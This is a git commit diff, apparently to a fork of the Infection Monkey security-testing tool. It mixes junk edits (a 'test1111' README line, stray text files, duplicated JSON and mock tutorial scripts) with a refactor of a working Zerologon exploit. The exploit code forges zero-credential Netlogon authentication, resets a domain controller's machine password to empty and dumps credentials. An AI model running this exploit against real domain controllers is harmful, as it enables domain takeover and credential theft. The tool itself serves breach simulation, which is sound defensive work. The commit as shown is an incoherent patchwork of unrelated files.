Update README.md

ysdf
Co-authored-by: p15670423 <p15670423@example.org>
Co-committed-by: p15670423 <p15670423@example.org>

README.md

@@ -29,7 +29,7 @@ Monkey on our [website](https://www.akamai.com/infectionmonkey).
 For more information, or to apply, see the official job post:
   - [Israel](https://akamaicareers.inflightcloud.com/jobdetails/aka_ext/028224?section=aka_ext&job=028224)
 
-
+test1111
 
 ## Screenshots
 

c/test_dumps.py

@@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)

ces.txt

@@ -0,0 +1 @@
+是分为氛围

ces11.txt

@@ -0,0 +1 @@
+123456

monkey/common/agent_events/__init__.py

@@ -4,4 +4,3 @@ from .ping_scan_event import PingScanEvent
 from .tcp_scan_event import TCPScanEvent
 from .exploitation_event import ExploitationEvent
 from .propagation_event import PropagationEvent
-from .password_restoration_event import PasswordRestorationEvent

monkey/common/agent_events/password_restoration_event.py

@@ -1,18 +0,0 @@
-from ipaddress import IPv4Address
-
-from . import AbstractAgentEvent
-
-
-class PasswordRestorationEvent(AbstractAgentEvent):
-    """
-    An event that occurs when a password has been restored on the target
-    system
-
-    Attributes:
-        :param target: The IP of the target system on which the
-            restoration was performed
-        :param success: If the password restoration was successful
-    """
-
-    target: IPv4Address
-    success: bool

monkey/infection_monkey/exploit/zerologon.py

@@ -9,25 +9,21 @@ import os
 import re
 import tempfile
 from binascii import unhexlify
-from time import time
 from typing import Dict, List, Optional, Sequence, Tuple
 
 import impacket
-from impacket.dcerpc.v5 import nrpc, rpcrt
+from impacket.dcerpc.v5 import epm, nrpc, rpcrt, transport
 from impacket.dcerpc.v5.dtypes import NULL
 
-from common.agent_events import CredentialsStolenEvent, PasswordRestorationEvent
+from common.agent_events import CredentialsStolenEvent
+from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
 from common.credentials import Credentials, LMHash, NTHash, Username
-from common.tags import (
+from common.tags import T1003_ATTACK_TECHNIQUE_TAG, T1098_ATTACK_TECHNIQUE_TAG
-    T1003_ATTACK_TECHNIQUE_TAG,
-    T1098_ATTACK_TECHNIQUE_TAG,
-    T1210_ATTACK_TECHNIQUE_TAG,
-)
 from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.wmi_tools import WmiTools
 from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
 from infection_monkey.exploit.zerologon_utils.options import OptionsForSecretsdump
-from infection_monkey.exploit.zerologon_utils.vuln_assessment import connect_to_dc, get_dc_details
+from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details, is_exploitable
 from infection_monkey.exploit.zerologon_utils.wmiexec import Wmiexec
 from infection_monkey.i_puppet import ExploiterResultData
 from infection_monkey.utils.capture_output import StdoutCapture
@@ -38,7 +34,7 @@ logger = logging.getLogger(__name__)
 
 ZEROLOGON_EXPLOITER_TAG = "zerologon-exploiter"
 
-CREDENTIALS_STOLEN_EVENT_TAGS = frozenset(
+ZEROLOGON_EVENT_TAGS = frozenset(
     {
         ZEROLOGON_EXPLOITER_TAG,
         T1003_ATTACK_TECHNIQUE_TAG,
@@ -46,19 +42,9 @@ CREDENTIALS_STOLEN_EVENT_TAGS = frozenset(
     }
 )
 
-PASSWORD_RESTORATION_EVENT_TAGS = frozenset({ZEROLOGON_EXPLOITER_TAG})
-
 
 class ZerologonExploiter(HostExploiter):
     _EXPLOITED_SERVICE = "Netlogon"
-    _EXPLOITER_TAGS = (
-        ZEROLOGON_EXPLOITER_TAG,
-        T1003_ATTACK_TECHNIQUE_TAG,
-        T1098_ATTACK_TECHNIQUE_TAG,
-        T1210_ATTACK_TECHNIQUE_TAG,
-    )
-    _PROPAGATION_TAGS: Tuple[str, ...] = tuple()
-
     MAX_ATTEMPTS = 2000  # For 2000, expected average number of attempts needed: 256.
     ERROR_CODE_ACCESS_DENIED = 0xC0000022
 
@@ -75,8 +61,8 @@ class ZerologonExploiter(HostExploiter):
     def _exploit_host(self) -> ExploiterResultData:
         self.dc_ip, self.dc_name, self.dc_handle = get_dc_details(self.host)
 
-        authenticated, rpc_con = self.authenticate()
+        can_exploit, rpc_con = is_exploitable(self)
-        if authenticated:
+        if can_exploit:
             logger.info("Target vulnerable, changing account password to empty string.")
 
             if self._is_interrupted():
@@ -87,7 +73,7 @@ class ZerologonExploiter(HostExploiter):
             logger.debug("Attempting exploit.")
             _exploited = self._send_exploit_rpc_login_requests(rpc_con)
 
-            rpc_con.disconnect()  # type: ignore[union-attr]
+            rpc_con.disconnect()
 
         else:
             logger.info(
@@ -113,107 +99,39 @@ class ZerologonExploiter(HostExploiter):
 
         return self.exploit_result
 
-    def authenticate(self) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]:
+    @staticmethod
-        """
+    def connect_to_dc(dc_ip) -> object:
-        Attempt to authenticate with the domain controller
+        binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
-
+        rpc_transport = transport.DCERPCTransportFactory(binding)
-        :return:
+        rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
-            - Whether or not authentication was successful
+        rpc_con = rpc_transport.get_dce_rpc()
-            - An RPC connection on success, otherwise None
+        rpc_con.connect()
-        """
+        rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
-        # Connect to the DC's Netlogon service.
+        return rpc_con
-        try:
-            rpc_con = connect_to_dc(self.dc_ip)
-        except Exception as err:
-            error_message = f"Exception occurred while connecting to DC: {err}"
-            logger.info(error_message)
-            return False, None
-
-        # Try authenticating.
-        for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
-            timestamp = time()
-            try:
-                rpc_con_auth_result = self._try_zero_authenticate(rpc_con)
-                if rpc_con_auth_result is not None:
-                    return True, rpc_con_auth_result
-
-                error_message = "Failed to authenticate with domain controller"
-                self._publish_exploitation_event(timestamp, False, error_message=error_message)
-            except Exception as err:
-                error_message = f"Error occured while authenticating to {self.host}: {err}"
-                logger.info(error_message)
-                self._publish_exploitation_event(timestamp, False, error_message=error_message)
-                return False, None
-
-        return False, None
-
-    def _try_zero_authenticate(self, rpc_con: rpcrt.DCERPC_v5) -> rpcrt.DCERPC_v5:
-        plaintext = b"\x00" * 8
-        ciphertext = b"\x00" * 8
-        flags = 0x212FFFFF
-
-        # Send challenge and authentication request.
-        nrpc.hNetrServerReqChallenge(
-            rpc_con,
-            self.dc_handle + "\x00",
-            self.dc_name + "\x00",
-            plaintext,
-        )
-
-        try:
-            server_auth = nrpc.hNetrServerAuthenticate3(
-                rpc_con,
-                self.dc_handle + "\x00",
-                self.dc_name + "$\x00",
-                nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
-                self.dc_name + "\x00",
-                ciphertext,
-                flags,
-            )
-
-            assert server_auth["ErrorCode"] == 0
-            return rpc_con
-
-        except nrpc.DCERPCSessionError as ex:
-            if (
-                ex.get_error_code() == 0xC0000022
-            ):  # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
-                pass
-            else:
-                raise Exception(f"Unexpected error code: {ex.get_error_code()}.")
-
-        except BaseException as ex:
-            raise Exception(f"Unexpected error: {ex}.")
 
     def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
         for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
-            exploit_attempt_result, timestamp = self.try_exploit_attempt(rpc_con)
+            exploit_attempt_result = self.try_exploit_attempt(rpc_con)
 
-            is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result, timestamp)
+            is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result)
             if is_exploited:
                 return True
 
         return False
 
-    def try_exploit_attempt(self, rpc_con) -> Tuple[Optional[object], float]:
+    def try_exploit_attempt(self, rpc_con) -> Optional[object]:
-        error_message = ""
-        timestamp = time()
         try:
             exploit_attempt_result = self.attempt_exploit(rpc_con)
-            return exploit_attempt_result, timestamp
+            return exploit_attempt_result
-        except nrpc.DCERPCSessionError as err:
+        except nrpc.DCERPCSessionError as e:
             # Failure should be due to a STATUS_ACCESS_DENIED error.
             # Otherwise, the attack is probably not working.
-            if err.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
+            if e.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
-                error_message = f"Unexpected error code from DC: {err.get_error_code()}"
+                logger.info(f"Unexpected error code from DC: {e.get_error_code()}")
-                logger.info(error_message)
+        except BaseException as e:
-        except Exception as err:
+            logger.info(f"Unexpected error: {e}")
-            error_message = f"Unexpected error: {err}"
-            logger.info(error_message)
 
-        self._publish_exploitation_event(timestamp, False, error_message=error_message)
+        return None
-
-        return None, timestamp
 
     def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
         request = nrpc.NetrServerPasswordSet2()
@@ -234,24 +152,19 @@ class ZerologonExploiter(HostExploiter):
         request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
         request["Authenticator"] = authenticator
 
-    def assess_exploit_attempt_result(self, exploit_attempt_result, timestamp: float) -> bool:
+    def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool:
         if exploit_attempt_result:
             if exploit_attempt_result["ErrorCode"] == 0:
                 self.report_login_attempt(result=True, user=self.dc_name)
                 _exploited = True
                 logger.info("Exploit complete!")
-
-                self._publish_exploitation_event(timestamp, True)
             else:
                 self.report_login_attempt(result=False, user=self.dc_name)
                 _exploited = False
-                error_message = (
+                logger.info(
-                    f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
+                    f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something "
-                    "Something went wrong."
+                    f"went wrong."
                 )
-                logger.info(error_message)
-
-                self._publish_exploitation_event(timestamp, False, error_message=error_message)
             return _exploited
 
         return False
@@ -289,7 +202,7 @@ class ZerologonExploiter(HostExploiter):
 
             # Connect to the DC's Netlogon service.
             try:
-                rpc_con = connect_to_dc(self.dc_ip)
+                rpc_con = ZerologonExploiter.connect_to_dc(self.dc_ip)
             except Exception as e:
                 logger.info(f"Exception occurred while connecting to DC: {str(e)}")
                 return False
@@ -397,8 +310,7 @@ class ZerologonExploiter(HostExploiter):
     ) -> None:
         credentials_stolen_event = CredentialsStolenEvent(
             source=get_agent_id(),
-            target=self.host.ip_addr,
+            tags=ZEROLOGON_EVENT_TAGS,
-            tags=CREDENTIALS_STOLEN_EVENT_TAGS,
             stolen_credentials=extracted_credentials,
         )
         self.agent_event_queue.publish(credentials_stolen_event)
@@ -566,22 +478,11 @@ class ZerologonExploiter(HostExploiter):
 
     def assess_restoration_attempt_result(self, restoration_attempt_result) -> bool:
         if restoration_attempt_result:
-            self._publish_password_restoration_event(success=True)
             logger.debug("DC machine account password should be restored to its original value.")
             return True
 
-        self._publish_password_restoration_event(success=False)
         return False
 
-    def _publish_password_restoration_event(self, success: bool):
-        password_restoration_event = PasswordRestorationEvent(
-            source=get_agent_id(),
-            target=self.host.ip_addr,
-            tags=PASSWORD_RESTORATION_EVENT_TAGS,
-            success=success,
-        )
-        self.agent_event_queue.publish(password_restoration_event)
-
 
 class NetrServerPasswordSet(nrpc.NDRCALL):
     opnum = 6

monkey/infection_monkey/exploit/zerologon_utils/vuln_assessment.py

@@ -1,26 +1,17 @@
 import logging
-from typing import Tuple
+from typing import Optional, Tuple
 
 import nmb.NetBIOS
-from impacket.dcerpc.v5 import epm, nrpc, transport
+from impacket.dcerpc.v5 import nrpc, rpcrt
 
-from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
+from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
 from common.utils.exceptions import DomainControllerNameFetchError
 from infection_monkey.model import VictimHost
+from infection_monkey.utils.threading import interruptible_iter
 
 logger = logging.getLogger(__name__)
 
 
-def connect_to_dc(dc_ip) -> object:
-    binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
-    rpc_transport = transport.DCERPCTransportFactory(binding)
-    rpc_transport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
-    rpc_con = rpc_transport.get_dce_rpc()
-    rpc_con.connect()
-    rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
-    return rpc_con
-
-
 def get_dc_details(host: VictimHost) -> Tuple[str, str, str]:
     dc_ip = host.ip_addr
     dc_name = _get_dc_name(dc_ip=dc_ip)
@@ -43,3 +34,65 @@ def _get_dc_name(dc_ip: str) -> str:
         raise DomainControllerNameFetchError(
             "Couldn't get domain controller's name, maybe it's on external network?"
         )
+
+
+def is_exploitable(zerologon_exploiter_object) -> Tuple[bool, Optional[rpcrt.DCERPC_v5]]:
+    # Connect to the DC's Netlogon service.
+    try:
+        rpc_con = zerologon_exploiter_object.connect_to_dc(zerologon_exploiter_object.dc_ip)
+    except Exception as e:
+        logger.info(f"Exception occurred while connecting to DC: {str(e)}")
+        return False, None
+
+    # Try authenticating.
+    for _ in interruptible_iter(
+        range(0, zerologon_exploiter_object.MAX_ATTEMPTS), zerologon_exploiter_object.interrupt
+    ):
+        try:
+            rpc_con_auth_result = _try_zero_authenticate(zerologon_exploiter_object, rpc_con)
+            if rpc_con_auth_result is not None:
+                return True, rpc_con_auth_result
+        except Exception as ex:
+            logger.info(ex)
+            return False, None
+
+    return False, None
+
+
+def _try_zero_authenticate(zerologon_exploiter_object, rpc_con: rpcrt.DCERPC_v5) -> rpcrt.DCERPC_v5:
+    plaintext = b"\x00" * 8
+    ciphertext = b"\x00" * 8
+    flags = 0x212FFFFF
+
+    # Send challenge and authentication request.
+    nrpc.hNetrServerReqChallenge(
+        rpc_con,
+        zerologon_exploiter_object.dc_handle + "\x00",
+        zerologon_exploiter_object.dc_name + "\x00",
+        plaintext,
+    )
+
+    try:
+        server_auth = nrpc.hNetrServerAuthenticate3(
+            rpc_con,
+            zerologon_exploiter_object.dc_handle + "\x00",
+            zerologon_exploiter_object.dc_name + "$\x00",
+            nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
+            zerologon_exploiter_object.dc_name + "\x00",
+            ciphertext,
+            flags,
+        )
+
+        assert server_auth["ErrorCode"] == 0
+        return rpc_con
+
+    except nrpc.DCERPCSessionError as ex:
+        if (
+            ex.get_error_code() == 0xC0000022
+        ):  # STATUS_ACCESS_DENIED error; if not this, probably some other issue.
+            pass
+        else:
+            raise Exception(f"Unexpected error code: {ex.get_error_code()}.")
+
+    except BaseException as ex:
+        raise Exception(f"Unexpected error: {ex}.")

monkey/tests/unit_tests/common/agent_events/test_password_restoration_event.py

@@ -1,76 +0,0 @@
-from ipaddress import IPv4Address
-from uuid import UUID
-
-import pytest
-
-from common.agent_events import PasswordRestorationEvent
-
-TARGET_IP_STR = "192.168.1.10"
-AGENT_ID = UUID("012e7238-7b81-4108-8c7f-0787bc3f3c10")
-TIMESTAMP = 1664371327.4067292
-
-PASSWORD_RESTORATION_EVENT = PasswordRestorationEvent(
-    source=AGENT_ID,
-    timestamp=TIMESTAMP,
-    target=IPv4Address(TARGET_IP_STR),
-    success=True,
-)
-
-PASSWORD_RESTORATION_OBJECT_DICT = {
-    "source": AGENT_ID,
-    "timestamp": TIMESTAMP,
-    "target": IPv4Address(TARGET_IP_STR),
-    "success": True,
-}
-
-PASSWORD_RESTORATION_SIMPLE_DICT = {
-    "source": str(AGENT_ID),
-    "timestamp": TIMESTAMP,
-    "target": TARGET_IP_STR,
-    "success": "true",
-}
-
-
-@pytest.mark.parametrize(
-    "password_restoration_event_dict",
-    [PASSWORD_RESTORATION_OBJECT_DICT, PASSWORD_RESTORATION_SIMPLE_DICT],
-)
-def test_constructor(password_restoration_event_dict):
-    assert PasswordRestorationEvent(**password_restoration_event_dict) == PASSWORD_RESTORATION_EVENT
-
-
-@pytest.mark.parametrize(
-    "key, value",
-    [
-        ("target", None),
-        ("success", "not-a-bool"),
-    ],
-)
-def test_construct_invalid_field__type_error(key, value):
-    invalid_type_dict = PASSWORD_RESTORATION_SIMPLE_DICT.copy()
-    invalid_type_dict[key] = value
-
-    with pytest.raises(TypeError):
-        PasswordRestorationEvent(**invalid_type_dict)
-
-
-@pytest.mark.parametrize(
-    "key, value",
-    [
-        ("target", "not-an-ip"),
-    ],
-)
-def test_construct_invalid_field__value_error(key, value):
-    invalid_type_dict = PASSWORD_RESTORATION_SIMPLE_DICT.copy()
-    invalid_type_dict[key] = value
-
-    with pytest.raises(ValueError):
-        PasswordRestorationEvent(**invalid_type_dict)
-
-
-def test_construct__extra_fields_forbidden():
-    extra_field_dict = PASSWORD_RESTORATION_SIMPLE_DICT.copy()
-    extra_field_dict["extra_field"] = 99  # red balloons
-
-    with pytest.raises(ValueError):
-        PasswordRestorationEvent(**extra_field_dict)

monkey/tests/unit_tests/infection_monkey/exploit/test_zerologon.py

@@ -1,11 +1,7 @@
-from unittest.mock import MagicMock
-
 import pytest
 
-from common.agent_events import ExploitationEvent, PasswordRestorationEvent
+DOMAIN_NAME = "domain-name"
-from common.event_queue import IAgentEventQueue
+IP = "0.0.0.0"
-from infection_monkey.model import VictimHost
-
 NETBIOS_NAME = "NetBIOS Name"
 
 USERS = ["Administrator", "Bob"]
@@ -15,12 +11,7 @@ NT_HASHES = ["def456", "765vut"]
 
 
 @pytest.fixture
-def mock_agent_event_queue():
+def zerologon_exploiter_object(monkeypatch):
-    return MagicMock(spec=IAgentEventQueue)
-
-
-@pytest.fixture
-def zerologon_exploiter_object(monkeypatch, mock_agent_event_queue):
     from infection_monkey.exploit.zerologon import ZerologonExploiter
 
     def mock_report_login_attempt(**kwargs):
@@ -29,57 +20,37 @@ def zerologon_exploiter_object(monkeypatch, mock_agent_event_queue):
     obj = ZerologonExploiter()
     monkeypatch.setattr(obj, "dc_name", NETBIOS_NAME, raising=False)
     monkeypatch.setattr(obj, "report_login_attempt", mock_report_login_attempt)
-    monkeypatch.setattr(obj, "host", VictimHost(ip_addr="1.1.1.1"))
-    monkeypatch.setattr(obj, "agent_event_queue", mock_agent_event_queue)
     return obj
 
 
 @pytest.mark.slow
-def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object, mock_agent_event_queue):
+def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object):
     dummy_exploit_attempt_result = {"ErrorCode": 0}
-    assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result, 0)
+    assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result)
-    assert mock_agent_event_queue.publish.call_count == 1
-    assert mock_agent_event_queue.publish.call_args[0][0].__class__ is ExploitationEvent
-    assert mock_agent_event_queue.publish.call_args[0][0].success
 
 
 @pytest.mark.slow
-def test_assess_exploit_attempt_result_with_error(
+def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object):
-    zerologon_exploiter_object, mock_agent_event_queue
-):
     dummy_exploit_attempt_result = {"ErrorCode": 1}
     assert not zerologon_exploiter_object.assess_exploit_attempt_result(
-        dummy_exploit_attempt_result, 0
+        dummy_exploit_attempt_result
     )
-    assert mock_agent_event_queue.publish.call_count == 1
-    assert mock_agent_event_queue.publish.call_args[0][0].__class__ is ExploitationEvent
-    assert not mock_agent_event_queue.publish.call_args[0][0].success
 
 
 @pytest.mark.slow
-def test_assess_restoration_attempt_result_restored(
+def test_assess_restoration_attempt_result_restored(zerologon_exploiter_object):
-    zerologon_exploiter_object, mock_agent_event_queue
-):
     dummy_restoration_attempt_result = object()
     assert zerologon_exploiter_object.assess_restoration_attempt_result(
         dummy_restoration_attempt_result
     )
-    assert mock_agent_event_queue.publish.call_count == 1
-    assert mock_agent_event_queue.publish.call_args[0][0].__class__ is PasswordRestorationEvent
-    assert mock_agent_event_queue.publish.call_args[0][0].success
 
 
 @pytest.mark.slow
-def test_assess_restoration_attempt_result_not_restored(
+def test_assess_restoration_attempt_result_not_restored(zerologon_exploiter_object):
-    zerologon_exploiter_object, mock_agent_event_queue
-):
     dummy_restoration_attempt_result = False
     assert not zerologon_exploiter_object.assess_restoration_attempt_result(
         dummy_restoration_attempt_result
     )
-    assert mock_agent_event_queue.publish.call_count == 1
-    assert mock_agent_event_queue.publish.call_args[0][0].__class__ is PasswordRestorationEvent
-    assert not mock_agent_event_queue.publish.call_args[0][0].success
 
 
 @pytest.mark.slow

test_dumps

@@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)

test_dumps.py

@@ -0,0 +1,13 @@
+import json
+data = {
+    'name' : 'myname',
+    'age' : 100,
+}
+# separators:是分隔符的意思，参数意思分别为不同dict项之间的分隔符和dict项内key和value之间的分隔符，把：和，后面的空格都除去了.
+# dumps 将python对象字典转换为json字符串
+json_str = json.dumps(data, separators=(',', ':'))
+print(type(json_str), json_str)
+
+# loads 将json字符串转化为python对象字典
+pyton_obj = json.loads(json_str)
+print(type(pyton_obj), pyton_obj)

vulture_allowlist.py

@@ -7,13 +7,7 @@ from common.agent_configuration.agent_sub_configurations import (
     CustomPBAConfiguration,
     ScanTargetConfiguration,
 )
-from common.agent_events import (
+from common.agent_events import ExploitationEvent, PingScanEvent, PropagationEvent, TCPScanEvent
-    ExploitationEvent,
-    PasswordRestorationEvent,
-    PingScanEvent,
-    PropagationEvent,
-    TCPScanEvent,
-)
 from common.credentials import Credentials, LMHash, NTHash
 from common.tags import (
     T1021_ATTACK_TECHNIQUE_TAG,
@@ -342,7 +336,6 @@ T1222_ATTACK_TECHNIQUE_TAG
 T1570_ATTACK_TECHNIQUE_TAG
 HostExploiter._publish_propagation_event
 HostExploiter._publish_exploitation_event
-PasswordRestorationEvent
 
 # pydantic base models
 underscore_attrs_are_private

zmtest04/test_mock.py

@@ -0,0 +1,21 @@
+import unittest
+from mock import Mock
+
+
+def VerifyPhone():
+    '''
+    校验用户手机号
+    '''
+    pass
+
+
+class TestVerifyPhone(unittest.TestCase):
+
+    def test_verify_phone(self):
+        data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
+        VerifyPhone = Mock(return_value=data)
+        self.assertEqual("success", VerifyPhone()["msg"]["result"])
+        print('测试用例')
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)

zmtest05 - 副本/test_mock.py

@@ -0,0 +1,21 @@
+import unittest
+from mock import Mock
+
+
+def VerifyPhone():
+    '''
+    校验用户手机号
+    '''
+    pass
+
+
+class TestVerifyPhone(unittest.TestCase):
+
+    def test_verify_phone(self):
+        data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
+        VerifyPhone = Mock(return_value=data)
+        self.assertEqual("success", VerifyPhone()["msg"]["result"])
+        print('测试用例')
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)

zmtest05/test_mock.py

@@ -0,0 +1,21 @@
+import unittest
+from mock import Mock
+
+
+def VerifyPhone():
+    '''
+    校验用户手机号
+    '''
+    pass
+
+
+class TestVerifyPhone(unittest.TestCase):
+
+    def test_verify_phone(self):
+        data = {"code": "0000", "msg": {"result": "success", "phoneinfo": "移动用户"}}
+        VerifyPhone = Mock(return_value=data)
+        self.assertEqual("success", VerifyPhone()["msg"]["result"])
+        print('测试用例')
+
+if __name__ == '__main__':
+    unittest.main(verbosity=2)